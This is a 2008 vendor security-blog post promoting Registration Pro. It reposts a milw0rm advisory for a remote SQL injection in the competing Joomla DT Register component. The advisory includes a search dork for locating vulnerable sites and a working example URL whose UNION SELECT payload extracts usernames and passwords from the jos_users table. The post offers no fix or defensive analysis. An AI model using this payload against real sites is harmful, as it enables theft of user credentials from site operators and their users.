Home arrow Security Blog arrow Yet another reason to choose Registration Pro
Yet another reason to choose Registration Pro Print
Written by Mike Carson   
Thursday, 17 July 2008

We just seen this posted on milworm.com

 

This is yet another reason to choose Registration Pro and not an inferior product.


Joomla Component DT Register Remote SQL injection Vulnerability


 

 

 

/---------------------------------------------------------------\
\                                				/
/       Joomla Component DT Register Remote SQL injection       \
\                                				/
\---------------------------------------------------------------/


[*] Author    :  His0k4 [ALGERIAN HaCkeR]

[*] Dork      :  inurl:com_DTRegister eventId

[*] Vendor    :  http://www.dthdevelopment.com/components/dt-register.html

[*] POC        : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId={SQL}

[*] Example    : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId=-12 UNION SELECT concat(username,0x3a,password) FROM jos_users&task=pay_options&Itemid=138

[*] Greetings  : All friends & muslims HaCkeRs
                 www.dz-secure.com

----------------------------------------------------------------------------

# milw0rm.com [2008-07-16]

 

Comments (0)add comment

Write comment

security image
Write the displayed characters


busy
 
< Prev   Next >
[ Back ]